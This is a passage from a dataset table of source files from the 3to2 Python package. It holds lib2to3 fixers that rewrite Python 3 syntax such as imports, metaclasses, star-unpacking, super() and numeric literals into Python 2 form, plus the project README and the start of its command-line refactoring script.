code
stringlengths 501
5.19M
| package
stringlengths 2
81
| path
stringlengths 9
304
| filename
stringlengths 4
145
|
---|---|---|---|
import re
from lib2to3.pgen2 import token
from lib2to3 import fixer_base
from lib2to3.pygram import python_symbols as syms
from lib2to3.pytree import Node
from lib2to3.fixer_util import Number, Call, Attr, String, Name, ArgList, Comma
baseMAPPING = {'b':2, 'o':8, 'x':16}
def base(literal):
"""Returns the base of a valid py3k literal."""
literal = literal.strip()
# All literals that do not start with 0, or are 1 or more zeros.
if not literal.startswith("0") or re.match(r"0+$",literal):
return 10
elif literal[1] not in "box":
return 0
return baseMAPPING[literal[1]]
class FixNumliterals(fixer_base.BaseFix):
# We need to modify all numeric literals except floats, complex.
def unmatch(self, node):
"""Don't match complex numbers, floats, or base-10 ints"""
val = node.value
for bad in "jJ+-.":
if bad in val: return bad
base_ = base(val)
return base_ == 10 or base_ == 16
def match(self, node):
"""Match number literals that are not excluded by self.unmatch"""
return (node.type == token.NUMBER) and not self.unmatch(node)
def transform(self, node, results):
"""
Call __builtins__.long() with the value and the base of the value.
This works because 0b10 is int("10", 2), 0o10 is int("10", 8), etc.
"""
val = node.value
base_ = base(val)
if base_ == 8:
assert val.strip().startswith("0o") or \
val.strip().startswith("0O"), "Invalid format for octal literal"
node.changed()
node.value = "".join(("0",val[2:]))
elif base_ == 2:
assert val.startswith("0") and val[1] in "bB", \
"Invalid format for binary literal"
# __builtins__.long
func_name = Node(syms.power, Attr(Name("__builtins__"), \
Name("long")))
# ("...", 2)
func_args = [String("".join(("\"", val.strip()[2:], "\""))), \
Comma(), Number(2, prefix=" ")]
new_node = Call(func_name, func_args, node.prefix)
return new_node | 3to2 | /3to2-1.1.1.zip/3to2-1.1.1/lib3to2/fixes/fix_numliterals.py | fix_numliterals.py |
from lib2to3 import fixer_base
from lib2to3.fixer_util import Name, String, FromImport, Newline, Comma
from ..fixer_util import token, syms, Leaf, Node, Star, indentation, ImportAsName
TK_BASE_NAMES = ('ACTIVE', 'ALL', 'ANCHOR', 'ARC','BASELINE', 'BEVEL', 'BOTH',
'BOTTOM', 'BROWSE', 'BUTT', 'CASCADE', 'CENTER', 'CHAR',
'CHECKBUTTON', 'CHORD', 'COMMAND', 'CURRENT', 'DISABLED',
'DOTBOX', 'E', 'END', 'EW', 'EXCEPTION', 'EXTENDED', 'FALSE',
'FIRST', 'FLAT', 'GROOVE', 'HIDDEN', 'HORIZONTAL', 'INSERT',
'INSIDE', 'LAST', 'LEFT', 'MITER', 'MOVETO', 'MULTIPLE', 'N',
'NE', 'NO', 'NONE', 'NORMAL', 'NS', 'NSEW', 'NUMERIC', 'NW',
'OFF', 'ON', 'OUTSIDE', 'PAGES', 'PIESLICE', 'PROJECTING',
'RADIOBUTTON', 'RAISED', 'READABLE', 'RIDGE', 'RIGHT',
'ROUND', 'S', 'SCROLL', 'SE', 'SEL', 'SEL_FIRST', 'SEL_LAST',
'SEPARATOR', 'SINGLE', 'SOLID', 'SUNKEN', 'SW', 'StringTypes',
'TOP', 'TRUE', 'TclVersion', 'TkVersion', 'UNDERLINE',
'UNITS', 'VERTICAL', 'W', 'WORD', 'WRITABLE', 'X', 'Y', 'YES',
'wantobjects')
PY2MODULES = {
'urllib2' : (
'AbstractBasicAuthHandler', 'AbstractDigestAuthHandler',
'AbstractHTTPHandler', 'BaseHandler', 'CacheFTPHandler',
'FTPHandler', 'FileHandler', 'HTTPBasicAuthHandler',
'HTTPCookieProcessor', 'HTTPDefaultErrorHandler',
'HTTPDigestAuthHandler', 'HTTPError', 'HTTPErrorProcessor',
'HTTPHandler', 'HTTPPasswordMgr',
'HTTPPasswordMgrWithDefaultRealm', 'HTTPRedirectHandler',
'HTTPSHandler', 'OpenerDirector', 'ProxyBasicAuthHandler',
'ProxyDigestAuthHandler', 'ProxyHandler', 'Request',
'StringIO', 'URLError', 'UnknownHandler', 'addinfourl',
'build_opener', 'install_opener', 'parse_http_list',
'parse_keqv_list', 'randombytes', 'request_host', 'urlopen'),
'urllib' : (
'ContentTooShortError', 'FancyURLopener','URLopener',
'basejoin', 'ftperrors', 'getproxies',
'getproxies_environment', 'localhost', 'pathname2url',
'quote', 'quote_plus', 'splitattr', 'splithost',
'splitnport', 'splitpasswd', 'splitport', 'splitquery',
'splittag', 'splittype', 'splituser', 'splitvalue',
'thishost', 'unquote', 'unquote_plus', 'unwrap',
'url2pathname', 'urlcleanup', 'urlencode', 'urlopen',
'urlretrieve',),
'urlparse' : (
'parse_qs', 'parse_qsl', 'urldefrag', 'urljoin',
'urlparse', 'urlsplit', 'urlunparse', 'urlunsplit'),
'dbm' : (
'ndbm', 'gnu', 'dumb'),
'anydbm' : (
'error', 'open'),
'whichdb' : (
'whichdb',),
'BaseHTTPServer' : (
'BaseHTTPRequestHandler', 'HTTPServer'),
'CGIHTTPServer' : (
'CGIHTTPRequestHandler',),
'SimpleHTTPServer' : (
'SimpleHTTPRequestHandler',),
'FileDialog' : TK_BASE_NAMES + (
'FileDialog', 'LoadFileDialog', 'SaveFileDialog',
'dialogstates', 'test'),
'tkFileDialog' : (
'Directory', 'Open', 'SaveAs', '_Dialog', 'askdirectory',
'askopenfile', 'askopenfilename', 'askopenfilenames',
'askopenfiles', 'asksaveasfile', 'asksaveasfilename'),
'SimpleDialog' : TK_BASE_NAMES + (
'SimpleDialog',),
'tkSimpleDialog' : TK_BASE_NAMES + (
'askfloat', 'askinteger', 'askstring', 'Dialog'),
'SimpleXMLRPCServer' : (
'CGIXMLRPCRequestHandler', 'SimpleXMLRPCDispatcher',
'SimpleXMLRPCRequestHandler', 'SimpleXMLRPCServer',
'list_public_methods', 'remove_duplicates',
'resolve_dotted_attribute'),
'DocXMLRPCServer' : (
'DocCGIXMLRPCRequestHandler', 'DocXMLRPCRequestHandler',
'DocXMLRPCServer', 'ServerHTMLDoc','XMLRPCDocGenerator'),
}
MAPPING = { 'urllib.request' :
('urllib2', 'urllib'),
'urllib.error' :
('urllib2', 'urllib'),
'urllib.parse' :
('urllib2', 'urllib', 'urlparse'),
'dbm.__init__' :
('anydbm', 'whichdb'),
'http.server' :
('CGIHTTPServer', 'SimpleHTTPServer', 'BaseHTTPServer'),
'tkinter.filedialog' :
('tkFileDialog', 'FileDialog'),
'tkinter.simpledialog' :
('tkSimpleDialog', 'SimpleDialog'),
'xmlrpc.server' :
('DocXMLRPCServer', 'SimpleXMLRPCServer'),
}
# helps match 'http', as in 'from http.server import ...'
simple_name = "name='{name}'"
# helps match 'server', as in 'from http.server import ...'
simple_attr = "attr='{attr}'"
# helps match 'HTTPServer', as in 'from http.server import HTTPServer'
simple_using = "using='{using}'"
# helps match 'urllib.request', as in 'import urllib.request'
dotted_name = "dotted_name=dotted_name< {fmt_name} '.' {fmt_attr} >"
# helps match 'http.server', as in 'http.server.HTTPServer(...)'
power_twoname = "pow=power< {fmt_name} trailer< '.' {fmt_attr} > trailer< '.' using=any > any* >"
# helps match 'dbm.whichdb', as in 'dbm.whichdb(...)'
power_onename = "pow=power< {fmt_name} trailer< '.' using=any > any* >"
# helps match 'from http.server import HTTPServer'
# also helps match 'from http.server import HTTPServer, SimpleHTTPRequestHandler'
# also helps match 'from http.server import *'
from_import = "from_import=import_from< 'from' {modules} 'import' (import_as_name< using=any 'as' renamed=any> | in_list=import_as_names< using=any* > | using='*' | using=NAME) >"
# helps match 'import urllib.request'
name_import = "name_import=import_name< 'import' ({fmt_name} | in_list=dotted_as_names< imp_list=any* >) >"
#############
# WON'T FIX #
#############
# helps match 'import urllib.request as name'
name_import_rename = "name_import_rename=dotted_as_name< {fmt_name} 'as' renamed=any >"
# helps match 'from http import server'
from_import_rename = "from_import_rename=import_from< 'from' {fmt_name} 'import' ({fmt_attr} | import_as_name< {fmt_attr} 'as' renamed=any > | in_list=import_as_names< any* ({fmt_attr} | import_as_name< {fmt_attr} 'as' renamed=any >) any* >) >"
def all_modules_subpattern():
"""
Builds a pattern for all toplevel names
(urllib, http, etc)
"""
names_dot_attrs = [mod.split(".") for mod in MAPPING]
ret = "( " + " | ".join([dotted_name.format(fmt_name=simple_name.format(name=mod[0]),
fmt_attr=simple_attr.format(attr=mod[1])) for mod in names_dot_attrs])
ret += " | "
ret += " | ".join([simple_name.format(name=mod[0]) for mod in names_dot_attrs if mod[1] == "__init__"]) + " )"
return ret
def all_candidates(name, attr, MAPPING=MAPPING):
"""
Returns all candidate packages for the name.attr
"""
dotted = name + '.' + attr
assert dotted in MAPPING, "No matching package found."
ret = MAPPING[dotted]
if attr == '__init__':
return ret + (name,)
return ret
def new_package(name, attr, using, MAPPING=MAPPING, PY2MODULES=PY2MODULES):
"""
Returns which candidate package for name.attr provides using
"""
for candidate in all_candidates(name, attr, MAPPING):
if using in PY2MODULES[candidate]:
break
else:
candidate = None
return candidate
def build_import_pattern(mapping1, mapping2):
"""
mapping1: A dict mapping py3k modules to all possible py2k replacements
mapping2: A dict mapping py2k modules to the things they do
This builds a HUGE pattern to match all ways that things can be imported
"""
# py3k: urllib.request, py2k: ('urllib2', 'urllib')
yield from_import.format(modules=all_modules_subpattern())
for py3k, py2k in mapping1.items():
name, attr = py3k.split('.')
s_name = simple_name.format(name=name)
s_attr = simple_attr.format(attr=attr)
d_name = dotted_name.format(fmt_name=s_name, fmt_attr=s_attr)
yield name_import.format(fmt_name=d_name)
yield power_twoname.format(fmt_name=s_name, fmt_attr=s_attr)
if attr == '__init__':
yield name_import.format(fmt_name=s_name)
yield power_onename.format(fmt_name=s_name)
yield name_import_rename.format(fmt_name=d_name)
yield from_import_rename.format(fmt_name=s_name, fmt_attr=s_attr)
def name_import_replacement(name, attr):
children = [Name("import")]
for c in all_candidates(name.value, attr.value):
children.append(Name(c, prefix=" "))
children.append(Comma())
children.pop()
replacement = Node(syms.import_name, children)
return replacement
class FixImports2(fixer_base.BaseFix):
run_order = 4
PATTERN = " | \n".join(build_import_pattern(MAPPING, PY2MODULES))
def transform(self, node, results):
# The patterns dictate which of these names will be defined
name = results.get("name")
attr = results.get("attr")
if attr is None:
attr = Name("__init__")
using = results.get("using")
in_list = results.get("in_list")
imp_list = results.get("imp_list")
power = results.get("pow")
before = results.get("before")
after = results.get("after")
d_name = results.get("dotted_name")
# An import_stmt is always contained within a simple_stmt
simple_stmt = node.parent
# The parent is useful for adding new import_stmts
parent = simple_stmt.parent
idx = parent.children.index(simple_stmt)
if any((results.get("from_import_rename") is not None,
results.get("name_import_rename") is not None)):
self.cannot_convert(node, reason="ambiguity: import binds a single name")
elif using is None and not in_list:
# import urllib.request, single-name import
replacement = name_import_replacement(name, attr)
replacement.prefix = node.prefix
node.replace(replacement)
elif using is None:
# import ..., urllib.request, math, http.sever, ...
for d_name in imp_list:
if d_name.type == syms.dotted_name:
name = d_name.children[0]
attr = d_name.children[2]
elif d_name.type == token.NAME and d_name.value + ".__init__" in MAPPING:
name = d_name
attr = Name("__init__")
else:
continue
if name.value + "." + attr.value not in MAPPING:
continue
candidates = all_candidates(name.value, attr.value)
children = [Name("import")]
for c in candidates:
children.append(Name(c, prefix=" "))
children.append(Comma())
children.pop()
# Put in the new statement.
indent = indentation(simple_stmt)
next_stmt = Node(syms.simple_stmt, [Node(syms.import_name, children), Newline()])
parent.insert_child(idx+1, next_stmt)
parent.insert_child(idx+1, Leaf(token.INDENT, indent))
# Remove the old imported name
test_comma = d_name.next_sibling
if test_comma and test_comma.type == token.COMMA:
test_comma.remove()
elif test_comma is None:
test_comma = d_name.prev_sibling
if test_comma and test_comma.type == token.COMMA:
test_comma.remove()
d_name.remove()
if not in_list.children:
simple_stmt.remove()
elif in_list is not None:
##########################################################
# "from urllib.request import urlopen, urlretrieve, ..." #
# Replace one import statement with potentially many. #
##########################################################
packages = dict([(n,[]) for n in all_candidates(name.value,
attr.value)])
# Figure out what names need to be imported from what
# Add them to a dict to be parsed once we're completely done
for imported in using:
if imported.type == token.COMMA:
continue
if imported.type == syms.import_as_name:
test_name = imported.children[0].value
if len(imported.children) > 2:
# 'as' whatever
rename = imported.children[2].value
else:
rename = None
elif imported.type == token.NAME:
test_name = imported.value
rename = None
pkg = new_package(name.value, attr.value, test_name)
packages[pkg].append((test_name, rename))
# Parse the dict to create new import statements to replace this one
imports = []
for new_pkg, names in packages.items():
if not names:
# Didn't import anything from that package, move along
continue
new_names = []
for test_name, rename in names:
if rename is None:
new_names.append(Name(test_name, prefix=" "))
else:
new_names.append(ImportAsName(test_name, rename, prefix=" "))
new_names.append(Comma())
new_names.pop()
imports.append(FromImport(new_pkg, new_names))
# Replace this import statement with one of the others
replacement = imports.pop()
replacement.prefix = node.prefix
node.replace(replacement)
indent = indentation(simple_stmt)
# Add the remainder of the imports as new statements.
while imports:
next_stmt = Node(syms.simple_stmt, [imports.pop(), Newline()])
parent.insert_child(idx+1, next_stmt)
parent.insert_child(idx+1, Leaf(token.INDENT, indent))
elif using.type == token.STAR:
# from urllib.request import *
nodes = [FromImport(pkg, [Star(prefix=" ")]) for pkg in
all_candidates(name.value, attr.value)]
replacement = nodes.pop()
replacement.prefix = node.prefix
node.replace(replacement)
indent = indentation(simple_stmt)
while nodes:
next_stmt = Node(syms.simple_stmt, [nodes.pop(), Newline()])
parent.insert_child(idx+1, next_stmt)
parent.insert_child(idx+1, Leaf(token.INDENT, indent))
elif power is not None:
# urllib.request.urlopen
# Replace it with urllib2.urlopen
pkg = new_package(name.value, attr.value, using.value)
# Remove the trailer node that contains attr.
if pkg:
if attr.parent:
attr.parent.remove()
name.replace(Name(pkg, prefix=name.prefix))
elif using.type == token.NAME:
# from urllib.request import urlopen
pkg = new_package(name.value, attr.value, using.value)
if attr.value == "__init__" and pkg == name.value:
# Replacing "from abc import xyz" with "from abc import xyz"
# Just leave it alone so as not to mess with other fixers
return
else:
node.replace(FromImport(pkg, [using])) | 3to2 | /3to2-1.1.1.zip/3to2-1.1.1/lib3to2/fixes/fix_imports2.py | fix_imports2.py |
from lib2to3 import fixer_base
from ..fixer_util import Name, syms, Node, Leaf, Newline, find_root, indentation, suitify
from lib2to3.pygram import token
def has_metaclass(parent):
results = None
for node in parent.children:
kids = node.children
if node.type == syms.argument:
if kids[0] == Leaf(token.NAME, "metaclass") and \
kids[1] == Leaf(token.EQUAL, "=") and \
kids[2]:
#Hack to avoid "class X(=):" with this case.
results = [node] + kids
break
elif node.type == syms.arglist:
# Argument list... loop through it looking for:
# Node(*, [*, Leaf(token.NAME, u"metaclass"), Leaf(token.EQUAL, u"="), Leaf(*, *)]
for child in node.children:
if results: break
if child.type == token.COMMA:
#Store the last comma, which precedes the metaclass
comma = child
elif type(child) == Node:
meta = equal = name = None
for arg in child.children:
if arg == Leaf(token.NAME, "metaclass"):
#We have the (metaclass) part
meta = arg
elif meta and arg == Leaf(token.EQUAL, "="):
#We have the (metaclass=) part
equal = arg
elif meta and equal:
#Here we go, we have (metaclass=X)
name = arg
results = (comma, meta, equal, name)
break
return results
class FixMetaclass(fixer_base.BaseFix):
PATTERN = """
classdef<any*>
"""
def transform(self, node, results):
meta_results = has_metaclass(node)
if not meta_results: return
for meta in meta_results:
meta.remove()
target = Leaf(token.NAME, "__metaclass__")
equal = Leaf(token.EQUAL, "=", prefix=" ")
# meta is the last item in what was returned by has_metaclass(): name
name = meta
name.prefix = " "
stmt_node = Node(syms.atom, [target, equal, name])
suitify(node)
left_ind, right_ind = 0, 0
for (ind, item) in enumerate(node.children):
if item.type == token.LPAR:
left_ind = ind
elif item.type == token.RPAR:
right_ind = ind
if item.type == syms.suite:
for stmt in item.children:
if stmt.type == token.INDENT:
# Insert, in reverse order, the statement, a newline,
# and an indent right after the first indented line
loc = item.children.index(stmt) + 1
# Keep consistent indentation form
ident = Leaf(token.INDENT, stmt.value)
item.insert_child(loc, ident)
item.insert_child(loc, Newline())
item.insert_child(loc, stmt_node)
break
if right_ind - left_ind == 1:
node.insert_child(left_ind + 1, Name("object")) | 3to2 | /3to2-1.1.1.zip/3to2-1.1.1/lib3to2/fixes/fix_metaclass.py | fix_metaclass.py |
from lib2to3 import fixer_base
from itertools import count
from ..fixer_util import Assign, Comma, Call, Newline, Name, Number, indentation, suitify, commatize, token, syms, Node, Leaf
def assignment_source(num_pre, num_post, LISTNAME, ITERNAME):
"""
Accepts num_pre and num_post, which are counts of values
before and after the starg (not including the starg)
Returns a source fit for Assign() from fixer_util
"""
children = []
pre = str(num_pre)
post = str(num_post)
# This code builds the assignment source from lib2to3 tree primitives.
# It's not very readable, but it seems like the most correct way to do it.
if num_pre > 0:
pre_part = Node(syms.power, [Name(LISTNAME), Node(syms.trailer, [Leaf(token.LSQB, "["), Node(syms.subscript, [Leaf(token.COLON, ":"), Number(pre)]), Leaf(token.RSQB, "]")])])
children.append(pre_part)
children.append(Leaf(token.PLUS, "+", prefix=" "))
main_part = Node(syms.power, [Leaf(token.LSQB, "[", prefix=" "), Name(LISTNAME), Node(syms.trailer, [Leaf(token.LSQB, "["), Node(syms.subscript, [Number(pre) if num_pre > 0 else Leaf(1, ""), Leaf(token.COLON, ":"), Node(syms.factor, [Leaf(token.MINUS, "-"), Number(post)]) if num_post > 0 else Leaf(1, "")]), Leaf(token.RSQB, "]"), Leaf(token.RSQB, "]")])])
children.append(main_part)
if num_post > 0:
children.append(Leaf(token.PLUS, "+", prefix=" "))
post_part = Node(syms.power, [Name(LISTNAME, prefix=" "), Node(syms.trailer, [Leaf(token.LSQB, "["), Node(syms.subscript, [Node(syms.factor, [Leaf(token.MINUS, "-"), Number(post)]), Leaf(token.COLON, ":")]), Leaf(token.RSQB, "]")])])
children.append(post_part)
source = Node(syms.arith_expr, children)
return source
class FixUnpacking(fixer_base.BaseFix):
PATTERN = """
expl=expr_stmt< testlist_star_expr<
pre=(any ',')*
star_expr< '*' name=NAME >
post=(',' any)* [','] > '=' source=any > |
impl=for_stmt< 'for' lst=exprlist<
pre=(any ',')*
star_expr< '*' name=NAME >
post=(',' any)* [','] > 'in' it=any ':' suite=any>"""
def fix_explicit_context(self, node, results):
pre, name, post, source = (results.get(n) for n in ("pre", "name", "post", "source"))
pre = [n.clone() for n in pre if n.type == token.NAME]
name.prefix = " "
post = [n.clone() for n in post if n.type == token.NAME]
target = [n.clone() for n in commatize(pre + [name.clone()] + post)]
# to make the special-case fix for "*z, = ..." correct with the least
# amount of modification, make the left-side into a guaranteed tuple
target.append(Comma())
source.prefix = ""
setup_line = Assign(Name(self.LISTNAME), Call(Name("list"), [source.clone()]))
power_line = Assign(target, assignment_source(len(pre), len(post), self.LISTNAME, self.ITERNAME))
return setup_line, power_line
def fix_implicit_context(self, node, results):
"""
Only example of the implicit context is
a for loop, so only fix that.
"""
pre, name, post, it = (results.get(n) for n in ("pre", "name", "post", "it"))
pre = [n.clone() for n in pre if n.type == token.NAME]
name.prefix = " "
post = [n.clone() for n in post if n.type == token.NAME]
target = [n.clone() for n in commatize(pre + [name.clone()] + post)]
# to make the special-case fix for "*z, = ..." correct with the least
# amount of modification, make the left-side into a guaranteed tuple
target.append(Comma())
source = it.clone()
source.prefix = ""
setup_line = Assign(Name(self.LISTNAME), Call(Name("list"), [Name(self.ITERNAME)]))
power_line = Assign(target, assignment_source(len(pre), len(post), self.LISTNAME, self.ITERNAME))
return setup_line, power_line
def transform(self, node, results):
"""
a,b,c,d,e,f,*g,h,i = range(100) changes to
_3to2list = list(range(100))
a,b,c,d,e,f,g,h,i, = _3to2list[:6] + [_3to2list[6:-2]] + _3to2list[-2:]
and
for a,b,*c,d,e in iter_of_iters: do_stuff changes to
for _3to2iter in iter_of_iters:
_3to2list = list(_3to2iter)
a,b,c,d,e, = _3to2list[:2] + [_3to2list[2:-2]] + _3to2list[-2:]
do_stuff
"""
self.LISTNAME = self.new_name("_3to2list")
self.ITERNAME = self.new_name("_3to2iter")
expl, impl = results.get("expl"), results.get("impl")
if expl is not None:
setup_line, power_line = self.fix_explicit_context(node, results)
setup_line.prefix = expl.prefix
power_line.prefix = indentation(expl.parent)
setup_line.append_child(Newline())
parent = node.parent
i = node.remove()
parent.insert_child(i, power_line)
parent.insert_child(i, setup_line)
elif impl is not None:
setup_line, power_line = self.fix_implicit_context(node, results)
suitify(node)
suite = [k for k in node.children if k.type == syms.suite][0]
setup_line.prefix = ""
power_line.prefix = suite.children[1].value
suite.children[2].prefix = indentation(suite.children[2])
suite.insert_child(2, Newline())
suite.insert_child(2, power_line)
suite.insert_child(2, Newline())
suite.insert_child(2, setup_line)
results.get("lst").replace(Name(self.ITERNAME, prefix=" ")) | 3to2 | /3to2-1.1.1.zip/3to2-1.1.1/lib3to2/fixes/fix_unpacking.py | fix_unpacking.py |
from .feature_base import Feature, Features
from lib2to3 import fixer_base
FEATURES = [
#(FeatureName,
# FeaturePattern,
# FeatureMinVersion,
#),
("memoryview",
"power < 'memoryview' trailer < '(' any* ')' > any* >",
"2.7",
),
("numbers",
"""import_from< 'from' 'numbers' 'import' any* > |
import_name< 'import' ('numbers' dotted_as_names< any* 'numbers' any* >) >""",
"2.6",
),
("abc",
"""import_name< 'import' ('abc' dotted_as_names< any* 'abc' any* >) > |
import_from< 'from' 'abc' 'import' any* >""",
"2.6",
),
("io",
"""import_name< 'import' ('io' dotted_as_names< any* 'io' any* >) > |
import_from< 'from' 'io' 'import' any* >""",
"2.6",
),
("bin",
"power< 'bin' trailer< '(' any* ')' > any* >",
"2.6",
),
("formatting",
"power< any trailer< '.' 'format' > trailer< '(' any* ')' > >",
"2.6",
),
("nonlocal",
"global_stmt< 'nonlocal' any* >",
"3.0",
),
("with_traceback",
"trailer< '.' 'with_traceback' >",
"3.0",
),
]
class FixFeatures(fixer_base.BaseFix):
run_order = 9 # Wait until all other fixers have run to check for these
# To avoid spamming, we only want to warn for each feature once.
features_warned = set()
# Build features from the list above
features = Features([Feature(name, pattern, version) for \
name, pattern, version in FEATURES])
PATTERN = features.PATTERN
def match(self, node):
to_ret = super(FixFeatures, self).match(node)
# We want the mapping only to tell us the node's specific information.
try:
del to_ret['node']
except Exception:
# We want it to delete the 'node' from the results
# if it's there, so we don't care if it fails for normal reasons.
pass
return to_ret
def transform(self, node, results):
for feature_name in results:
if feature_name in self.features_warned:
continue
else:
curr_feature = self.features[feature_name]
if curr_feature.version >= "3":
fail = self.cannot_convert
else:
fail = self.warning
fail(node, reason=curr_feature.message_text())
self.features_warned.add(feature_name) | 3to2 | /3to2-1.1.1.zip/3to2-1.1.1/lib3to2/fixes/fix_features.py | fix_features.py |
from lib2to3 import fixer_base
from ..fixer_util import Node, Leaf, token, syms, Name, Comma, Dot
dot_class = Node(syms.trailer, [Dot(), Name("__class__")])
def get_firstparam(super_node):
parent = super_node.parent
while parent.type != syms.funcdef and parent.parent:
parent = parent.parent
if parent.type != syms.funcdef:
# super() called without arguments outside of a funcdef
return None
children = parent.children
assert len(children) > 2
params = children[2]
assert params.type == syms.parameters
if len(params.children) < 3:
# Function has no parameters, therefore super() makes no sense here...
return None
args = params.children[1]
if args.type == token.NAME:
return args.value
elif args.type == syms.typedargslist:
assert len(args.children) > 0
if args.children[0].type == token.NAME:
return args.children[0].value
else:
# Probably a '*'
return None
def get_class_name(super_node):
parent = super_node.parent
while parent.type != syms.classdef and parent.parent:
parent = parent.parent
if parent.type != syms.classdef:
# super() called without arguments outside of a classdef
return None
children = parent.children
assert len(children) > 2
class_name = children[1]
assert class_name.type == token.NAME
return class_name.value
def insert_args(name, class_name, rparen):
parent = rparen.parent
if class_name:
class_node = Node(syms.power, [Name(class_name)])
else:
class_node = Node(syms.power, [Name(name), dot_class.clone()])
idx = parent.children.index(rparen)
parent.insert_child(idx, Name(name, prefix=" "))
parent.insert_child(idx, Comma())
parent.insert_child(idx, class_node)
class FixSuper(fixer_base.BaseFix):
PATTERN = "power< 'super' trailer< '(' rparen=')' > any* >"
def transform(self, node, results):
param = get_firstparam(node)
if param is None:
self.cannot_convert(node, "super() with no arguments must be called inside a function that has at least one parameter")
return
class_name = get_class_name(node)
rparen = results["rparen"]
insert_args(param, class_name, rparen) | 3to2 | /3to2-1.1.1.zip/3to2-1.1.1/lib3to2/fixes/fix_super.py | fix_super.py |
from lib2to3 import fixer_base
from lib2to3.fixer_util import Call
from lib2to3.pytree import Node, Leaf
from lib2to3.pgen2 import token
class FixReduce(fixer_base.BaseFix):
PATTERN = """
power< 'functools' trailer< '.' 'reduce' >
args=trailer< '(' arglist< any* > ')' > > |
imported=import_from< 'from' 'functools' 'import' 'reduce' > |
import_from< 'from' 'functools' 'import' import_as_names< any* in_list='reduce' any* > >
"""
def transform(self, node, results):
syms = self.syms
args, imported = (results.get("args"), results.get("imported"))
in_list = results.get("in_list")
if imported:
next = imported.next_sibling
prev = imported.prev_sibling
parent = imported.parent
if next and next.type == token.SEMI:
next.remove()
next = imported.next_sibling
imported.remove()
if next is not None and next.type == token.NEWLINE:
# nothing after from_import on the line
if prev is not None:
if prev.type == token.SEMI:
prev.remove()
elif parent.next_sibling is not None:
# nothing before from_import either
parent.next_sibling.prefix = imported.prefix
parent.remove()
elif args:
args = args.clone()
prefix = node.prefix
return Node(syms.power, [Leaf(token.NAME, "reduce"), args],
prefix=prefix)
elif in_list:
next = in_list.next_sibling
if next is not None:
if next.type == token.COMMA:
next.remove()
else:
prev = in_list.prev_sibling
if prev is not None:
if prev.type == token.COMMA:
prev.remove()
in_list.remove() | 3to2 | /3to2-1.1.1.zip/3to2-1.1.1/lib3to2/fixes/fix_reduce.py | fix_reduce.py |
Abstract
========
lib3to2 is a set of fixers that are intended to backport code written for
Python version 3.x into Python version 2.x. The final target 2.x version is
the latest version of the 2.7 branch, as that is the last release in the Python
2.x branch. Some attempts have been made, however, to make code compatible as
much as possible with versions of Python back to 2.5, and bug reports are still
welcome for Python features only present in 2.6+ that are not addressed by
lib3to2.
This project came about as a Google Summer of Code (TM) project in 2009.
Status
======
Because of the nature of the subject matter, 3to2 is not perfect, so check all
output manually. 3to2 does the bulk of the work, but there is code that simply
cannot be converted into a Python 2 equivalent for one reason or another.
3to2 will either produce working Python 2 code or warn about why it did not.
Any other behavior is a bug and should be reported.
lib3to2's fixers are somewhat well-tested individually, but there is no testing
that is done on interactions between multiple fixers, so most of the bugs in
the future will likely be found there.
Intention
=========
lib3to2 is intended to be a tool in the process of developing code that is
backwards-compatible between Python 3 and Python 2. It is not intended to be a
complete solution for directly backporting Python 3 code, though it can often
be used for this purpose without issue. Sufficiently large packages should be
developed with lib3to2 used throughout the process to avoid backwards-
incompatible code from becoming too embedded.
There are some features of Python 3 that have no equivalent in Python 2, and
though lib3to2 tries to fix as many of these as it can, some features are
beyond its grasp. This is especially true of features not readily detectable
by their syntax alone and extremely subtle features, so make sure that code
using lib3to2 is thoroughly tested.
Repository
==========
lib3to2 resides at http://bitbucket.org/amentajo/lib3to2, where the bug tracker
can be found at http://bitbucket.org/amentajo/lib3to2/issues
Usage
=====
Run "./3to2" to convert stdin ("-"), files or directories given as
arguments. By default, the tool outputs a unified diff-formatted patch on
standard output and a "what was changed" summary on standard error, but the
"-w" option can be given to write back converted files, creating
".bak"-named backup files.
If you are root, you can also install with "./setup.py build" and
"./setup.py install" ("make install" does this for you).
This branch of 3to2 must be run with Python 3.
To install locally (used for running tests as a non-privileged user), the
scripts assume you are using python3.1. Modify accordingly if you are not.
Relationship with lib2to3
=========================
Some of the fixers for lib3to2 are directly copy-pasted from their 2to3
equivalent, with the element of PATTERN and the corresponding transformation
switched places. Most fixers written for this program with a corresponding
2to3 fixer started from a clone of the 2to3 fixer, then modifying that fixer to
work in reverse. I do not claim original authorship of these fixers, but I do
claim that they will work for 3to2, independent of how they work for 2to3.
In addition, this program depends on lib2to3 to implement fixers, test cases,
refactoring, and grammar. Some portions of lib2to3 were modified to be more
generic to support lib3to2's calls.
You should use the latest version of lib2to3 from the Python sandbox rather
than the version (if any) that comes with Python. As a convenience,
"two2three" from the Python Package Index is a recent enough version of lib2to3
renamed to avoid conflicts. To use this package, replace all usage of
"lib2to3" with "two2three" within the 3to2 source files after installing
"two2three" from the PyPI. Depending on the developer's mood, a version of
3to2 may be provided with this change already made. | 3to2_py3k | /3to2_py3k-1.0.tar.gz/3to2_py3k-1.0/README | README |
import sys
import os
import difflib
import logging
import shutil
import optparse
from lib2to3 import refactor
from lib2to3 import pygram
def diff_texts(a, b, filename):
"""Return a unified diff of two strings."""
a = a.splitlines()
b = b.splitlines()
return difflib.unified_diff(a, b, filename, filename,
"(original)", "(refactored)",
lineterm="")
class StdoutRefactoringTool(refactor.MultiprocessRefactoringTool):
"""
Prints output to stdout.
"""
def __init__(self, fixers, options, explicit, nobackups, show_diffs):
self.nobackups = nobackups
self.show_diffs = show_diffs
super(StdoutRefactoringTool, self).__init__(fixers, options, explicit)
self.driver.grammar = pygram.python_grammar_no_print_statement
def refactor_string(self, data, name):
"""Override to keep print statements out of the grammar"""
try:
tree = self.driver.parse_string(data)
except Exception as err:
self.log_error("Can't parse %s: %s: %s",
name, err.__class__.__name__, err)
return
self.log_debug("Refactoring %s", name)
self.refactor_tree(tree, name)
return tree
def log_error(self, msg, *args, **kwargs):
self.errors.append((msg, args, kwargs))
self.logger.error(msg, *args, **kwargs)
def write_file(self, new_text, filename, old_text, encoding):
if not self.nobackups:
# Make backup
backup = filename + ".bak"
if os.path.lexists(backup):
try:
os.remove(backup)
except os.error as err:
self.log_message("Can't remove backup %s", backup)
try:
os.rename(filename, backup)
except os.error as err:
self.log_message("Can't rename %s to %s", filename, backup)
# Actually write the new file
write = super(StdoutRefactoringTool, self).write_file
write(new_text, filename, old_text, encoding)
if not self.nobackups:
shutil.copymode(backup, filename)
def print_output(self, old, new, filename, equal):
if equal:
self.log_message("No changes to %s", filename)
else:
self.log_message("Refactored %s", filename)
if self.show_diffs:
for line in diff_texts(old, new, filename):
print(line)
def warn(msg):
